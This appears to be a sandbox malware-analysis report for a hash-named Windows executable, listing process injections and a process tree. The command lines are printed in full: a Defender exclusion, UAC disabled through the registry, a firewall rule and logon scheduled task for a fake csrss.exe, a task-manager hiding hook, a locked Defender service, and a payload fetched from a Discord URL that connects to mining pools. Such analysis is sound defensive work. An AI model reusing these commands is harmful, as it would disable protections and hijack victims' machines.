PID 2272 wrote to memory of 4556 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2272 wrote to memory of 4556 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2272 wrote to memory of 212 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2272 wrote to memory of 212 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2272 wrote to memory of 212 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 4556 wrote to memory of 3932 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\fKZRHEfYlQuPD6l3AskVdPrk.exe
PID 4556 wrote to memory of 3932 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\fKZRHEfYlQuPD6l3AskVdPrk.exe
PID 4556 wrote to memory of 3932 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\fKZRHEfYlQuPD6l3AskVdPrk.exe
PID 4556 wrote to memory of 4228 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe
PID 4556 wrote to memory of 4228 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe
PID 4556 wrote to memory of 4228 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe
PID 4556 wrote to memory of 1748 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe
PID 4556 wrote to memory of 1748 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe
PID 4556 wrote to memory of 1748 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe
PID 4556 wrote to memory of 4424 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe
PID 4556 wrote to memory of 4424 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe
PID 4556 wrote to memory of 4424 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe
PID 4556 wrote to memory of 524 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe
PID 4556 wrote to memory of 524 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe
PID 4556 wrote to memory of 524 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe
PID 3932 wrote to memory of 508 N/A C:\Users\Admin\Pictures\fKZRHEfYlQuPD6l3AskVdPrk.exe C:\Users\Admin\AppData\Local\Temp\u318.0.exe
PID 3932 wrote to memory of 508 N/A C:\Users\Admin\Pictures\fKZRHEfYlQuPD6l3AskVdPrk.exe C:\Users\Admin\AppData\Local\Temp\u318.0.exe
PID 3932 wrote to memory of 508 N/A C:\Users\Admin\Pictures\fKZRHEfYlQuPD6l3AskVdPrk.exe C:\Users\Admin\AppData\Local\Temp\u318.0.exe
PID 4228 wrote to memory of 4748 N/A C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4228 wrote to memory of 4748 N/A C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4228 wrote to memory of 4748 N/A C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1748 wrote to memory of 1976 N/A C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1748 wrote to memory of 1976 N/A C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1748 wrote to memory of 1976 N/A C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 524 wrote to memory of 3200 N/A C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 524 wrote to memory of 3200 N/A C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 524 wrote to memory of 3200 N/A C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4424 wrote to memory of 3564 N/A C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4424 wrote to memory of 3564 N/A C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4424 wrote to memory of 3564 N/A C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3932 wrote to memory of 5852 N/A C:\Users\Admin\Pictures\fKZRHEfYlQuPD6l3AskVdPrk.exe C:\Users\Admin\AppData\Local\Temp\u318.1.exe
PID 3932 wrote to memory of 5852 N/A C:\Users\Admin\Pictures\fKZRHEfYlQuPD6l3AskVdPrk.exe C:\Users\Admin\AppData\Local\Temp\u318.1.exe
PID 3932 wrote to memory of 5852 N/A C:\Users\Admin\Pictures\fKZRHEfYlQuPD6l3AskVdPrk.exe C:\Users\Admin\AppData\Local\Temp\u318.1.exe
PID 5676 wrote to memory of 5944 N/A C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5676 wrote to memory of 5944 N/A C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5676 wrote to memory of 5944 N/A C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5604 wrote to memory of 5960 N/A C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5604 wrote to memory of 5960 N/A C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5604 wrote to memory of 5960 N/A C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5632 wrote to memory of 6108 N/A C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5632 wrote to memory of 6108 N/A C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5632 wrote to memory of 6108 N/A C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5592 wrote to memory of 6116 N/A C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5592 wrote to memory of 6116 N/A C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5592 wrote to memory of 6116 N/A C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5676 wrote to memory of 1720 N/A C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
PID 5676 wrote to memory of 1720 N/A C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
PID 1720 wrote to memory of 5988 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\netsh.exe
PID 1720 wrote to memory of 5988 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\netsh.exe
PID 5604 wrote to memory of 3216 N/A C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe C:\Windows\System32\cmd.exe
PID 5604 wrote to memory of 3216 N/A C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe C:\Windows\System32\cmd.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe

"C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"

C:\Users\Admin\Pictures\fKZRHEfYlQuPD6l3AskVdPrk.exe

"C:\Users\Admin\Pictures\fKZRHEfYlQuPD6l3AskVdPrk.exe"

C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe

"C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe"

C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe

"C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe"

C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe

"C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe"

C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe

"C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe"

C:\Users\Admin\AppData\Local\Temp\u318.0.exe

"C:\Users\Admin\AppData\Local\Temp\u318.0.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\u318.1.exe

"C:\Users\Admin\AppData\Local\Temp\u318.1.exe"

C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe

"C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe"

C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe

"C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe"

C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe

"C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe"

C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe

"C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\System32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\System32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\System32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 1180

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=al2xoqueel0She4t -m=https://cdn.discordapp.com/attachments/1225871855328559147/1225878907014615161/kVYazCOZSwqudV?ex=6622bbb3&is=661046b3&hm=c80160577fcc82f0e337c537bdd214d60583ed75bb187a016d90f94471fc09b0& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe

C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe

C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe

Network

Files
